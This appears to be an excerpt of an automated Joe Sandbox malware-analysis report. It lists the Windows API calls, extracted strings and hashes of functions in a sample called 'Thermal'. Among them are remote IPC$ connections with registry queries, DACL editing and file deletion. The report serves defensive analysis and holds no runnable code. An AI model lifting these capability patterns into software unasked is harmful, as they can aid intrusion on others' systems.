                                                • Instruction ID: faff6061c0f7c0c0721907221ac1108f60481ade9102d2ecc0471562f7736a1d
                                                • Opcode Fuzzy Hash: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
                                                • Instruction Fuzzy Hash: FF6139725047459FCB11EF60C848A9EB3F8BF89310F04891EF98987251DB39E945CB92
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA2C2
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007DA2E3
                                                • __swprintf.LIBCMT ref: 007DA33C
                                                • __swprintf.LIBCMT ref: 007DA355
                                                • _wprintf.LIBCMT ref: 007DA3FC
                                                • _wprintf.LIBCMT ref: 007DA41A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-3080491070
                                                • Opcode ID: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
                                                • Instruction ID: 6fe24bf3e8ac3bbf9c94635811f1e480c60819c7c8ff8bda0650fec2cc3b3114
                                                • Opcode Fuzzy Hash: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
                                                • Instruction Fuzzy Hash: 9051AC71940219EACF24FBE0DD4AEEEB779BF04340F500166F405A2192EB392E5ACB61
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,007BF8B8,00000001,0000138C,00000001,00000000,00000001,?,007E3FF9,00000000), ref: 007D009A
                                                • LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00A3
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • GetModuleHandleW.KERNEL32(00000000,00837310,?,00000FFF,?,?,007BF8B8,00000001,0000138C,00000001,00000000,00000001,?,007E3FF9,00000000,00000001), ref: 007D00C5
                                                • LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00C8
                                                • __swprintf.LIBCMT ref: 007D0118
                                                • __swprintf.LIBCMT ref: 007D0129
                                                • _wprintf.LIBCMT ref: 007D01D2
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D01E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 984253442-2268648507
                                                • Opcode ID: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
                                                • Instruction ID: 0bbc4d95dfd84d5bd7a4d6c5d9d4b681df060981c1969a569e16b4ebc93ed593
                                                • Opcode Fuzzy Hash: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
                                                • Instruction Fuzzy Hash: 29413F72840219EACF14FBE0DD9AEEEB77DEF14340F900155F505A2192DA396F4ACBA1
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • CharLowerBuffW.USER32(?,?), ref: 007DAA0E
                                                • GetDriveTypeW.KERNEL32 ref: 007DAA5B
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAAA3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAADA
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAB08
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
                                                • Instruction ID: d7ca05c1da3260f2662f1152f2f05840dcda19c10f0d0814750bbddd97110a59
                                                • Opcode Fuzzy Hash: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
                                                • Instruction Fuzzy Hash: 47514971204205EFC700EF20D88596AB3F8FF94758F50896DF895972A1DB39AD0ACB92
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA852
                                                • __swprintf.LIBCMT ref: 007DA874
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA8B1
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA8D6
                                                • _memset.LIBCMT ref: 007DA8F5
                                                • _wcsncpy.LIBCMT ref: 007DA931
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA966
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA971
                                                • RemoveDirectoryW.KERNEL32(?), ref: 007DA97A
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA984
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
                                                • Instruction ID: b1bf7a3c3a6e5a8305ae805fc7d560bba8e475aabbfe62f1c3b8dd58dbdfa4dc
                                                • Opcode Fuzzy Hash: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
                                                • Instruction Fuzzy Hash: AB3172B1900219BBDB219FA0DC49FEB77BCFF89700F1041A6F909D6160EB7496458B25
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007F982C,?,?), ref: 007FC0C8
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0DF
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0EA
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0F7
                                                • GlobalLock.KERNEL32(00000000), ref: 007FC100
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC10F
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007FC118
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC11F
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC130
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00803C7C,?), ref: 007FC149
                                                • GlobalFree.KERNEL32(00000000), ref: 007FC159
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007FC17D
                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007FC1A8
                                                • DeleteObject.GDI32(00000000), ref: 007FC1D0
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FC1E6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
                                                • Instruction ID: 15a4c91af5414fb111b0826c2f38e6d30d2910c93451207f60a79cdcd9e4ddda
                                                • Opcode Fuzzy Hash: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
                                                • Instruction Fuzzy Hash: 3641497160020CEFDB629F64DD88EAA7BB9FF89711F104058FA09E7260DB349941DF60
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC8A4
                                                • GetFocus.USER32 ref: 007FC8B4
                                                • GetDlgCtrlID.USER32(00000000), ref: 007FC8BF
                                                • _memset.LIBCMT ref: 007FC9EA
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FCA15
                                                • GetMenuItemCount.USER32(?), ref: 007FCA35
                                                • GetMenuItemID.USER32(?,00000000), ref: 007FCA48
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FCA7C
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FCAC4
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FCAFC
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FCB31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 2958512f4a48d2ef61f13d170c5f416929fb12bff8abb8beed154ae3cfcec8b0
                                                • Instruction ID: 1e39ef658cfa69bacb43d675871278810c3b7fac8f8f01c34d7a84ef50120ffc
                                                • Opcode Fuzzy Hash: 2958512f4a48d2ef61f13d170c5f416929fb12bff8abb8beed154ae3cfcec8b0
                                                • Instruction Fuzzy Hash: 53816CB06083099FD721CF14CA85A7A7BE9FB88354F00492DFA95A3391C774E905CFA2
                                                APIs
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                  • Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                  • Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                  • Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                  • Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
                                                  • Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
                                                  • Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8B2E
                                                • _memset.LIBCMT ref: 007C8B43
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8B62
                                                • GetLengthSid.ADVAPI32(?), ref: 007C8B73
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 007C8BB0
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C8BCC
                                                • GetLengthSid.ADVAPI32(?), ref: 007C8BE9
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C8BF8
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8BFF
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8C20
                                                • CopySid.ADVAPI32(00000000), ref: 007C8C27
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8C58
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8C7E
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8C92
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
                                                • Instruction ID: f723a31925bc5fc7abb3c3e3e0d073393d2e705b3120551a48b4fccbcdcf3064
                                                • Opcode Fuzzy Hash: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
                                                • Instruction Fuzzy Hash: 3E613771A00209EFDF509FA4DC45FAEBB79FF04300F0481AEE915A6291EB399A05CB61
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007E7A79
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E7A85
                                                • CreateCompatibleDC.GDI32(?), ref: 007E7A91
                                                • SelectObject.GDI32(00000000,?), ref: 007E7A9E
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E7AF2
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7B2E
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E7B52
                                                • SelectObject.GDI32(00000006,?), ref: 007E7B5A
                                                • DeleteObject.GDI32(?), ref: 007E7B63
                                                • DeleteDC.GDI32(00000006), ref: 007E7B6A
                                                • ReleaseDC.USER32(00000000,?), ref: 007E7B75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: ce1c89ce6452a46be53d5338ea7d5cd489c446ddb598abfb8caff89c26bd1200
                                                • Instruction ID: 42062161530bf136b37acc7d2d978e49a320bf604dadcbdf96a138efe7568dd6
                                                • Opcode Fuzzy Hash: ce1c89ce6452a46be53d5338ea7d5cd489c446ddb598abfb8caff89c26bd1200
                                                • Instruction Fuzzy Hash: DB513771904649EFCB24CFA9CC85FAEBBB9FF48310F14842DE95AA7210D635A940CB60
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA4D4
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 007DA4F6
                                                • __swprintf.LIBCMT ref: 007DA54F
                                                • __swprintf.LIBCMT ref: 007DA568
                                                • _wprintf.LIBCMT ref: 007DA61E
                                                • _wprintf.LIBCMT ref: 007DA63C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-2391861430
                                                • Opcode ID: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
                                                • Instruction ID: 238d89e686884dbe5f7623b202c3c9c64949fb6d82d6af2372ad7a300017252c
                                                • Opcode Fuzzy Hash: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
                                                • Instruction Fuzzy Hash: 44519B71840219FACF14FBA0DD4AEEEB779BF04340F500166F505A22A2EB396F59CB61
                                                APIs
                                                  • Part of subcall function 007D951A: __time64.LIBCMT ref: 007D9524
                                                  • Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4
                                                • __wsplitpath.LIBCMT ref: 007D97EF
                                                  • Part of subcall function 0079431E: __wsplitpath_helper.LIBCMT ref: 0079435E
                                                • _wcscpy.LIBCMT ref: 007D9802
                                                • _wcscat.LIBCMT ref: 007D9815
                                                • __wsplitpath.LIBCMT ref: 007D983A
                                                • _wcscat.LIBCMT ref: 007D9850
                                                • _wcscat.LIBCMT ref: 007D9863
                                                  • Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D9599
                                                  • Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D95A8
                                                • _wcscmp.LIBCMT ref: 007D97AA
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9A0D
                                                • _wcsncpy.LIBCMT ref: 007D9A80
                                                • DeleteFileW.KERNEL32(?,?), ref: 007D9AB6
                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D9ACC
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9ADD
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9AEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: 3f501fcbbb792406124c37b0b271a50d1a3721f66a4181f96e7055dcf3e68cc5
                                                • Instruction ID: 78306b6728a083c2d271600e92d9d57958030c157306b351603090abb624f420
                                                • Opcode Fuzzy Hash: 3f501fcbbb792406124c37b0b271a50d1a3721f66a4181f96e7055dcf3e68cc5
                                                • Instruction Fuzzy Hash: 2EC13CB1900219AADF15DFA5CC89EDEB7BDEF44300F0040ABF609E6251EB749A848F65
                                                APIs
                                                • _memset.LIBCMT ref: 00785BF1
                                                • GetMenuItemCount.USER32(00837890), ref: 007C0E7B
                                                • GetMenuItemCount.USER32(00837890), ref: 007C0F2B
                                                • GetCursorPos.USER32(?), ref: 007C0F6F
                                                • SetForegroundWindow.USER32(00000000), ref: 007C0F78
                                                • TrackPopupMenuEx.USER32(00837890,00000000,?,00000000,00000000,00000000), ref: 007C0F8B
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C0F97
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 2751501086-0
                                                • Opcode ID: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
                                                • Instruction ID: 56ed2ec339b2bf5c5423f0e6caa5f2a319abc62125fa231d4428731edf65963b
                                                • Opcode Fuzzy Hash: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
                                                • Instruction Fuzzy Hash: 7C71C070684619FEEB20AB54DC89FAABF64FF04764F10021AF524A61D1C7B96860DFE0
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • _memset.LIBCMT ref: 007C8489
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C84BE
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C84DA
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C84F6
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C8520
                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C8548
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8553
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8558
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 1411258926-22481851
                                                • Opcode ID: 9c949117aaca817c36975284a6239355faf55dfdf05670b160dae50f4fbada3d
                                                • Instruction ID: e2434bca671cb4799cd6d762fc763099d4652b140936a7a6cda077dc99bd8071
                                                • Opcode Fuzzy Hash: 9c949117aaca817c36975284a6239355faf55dfdf05670b160dae50f4fbada3d
                                                • Instruction Fuzzy Hash: 3E410872C5022DEBCF15EBA4EC99EEDB778FF04350F404169E815A2261EB385E05CB90
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
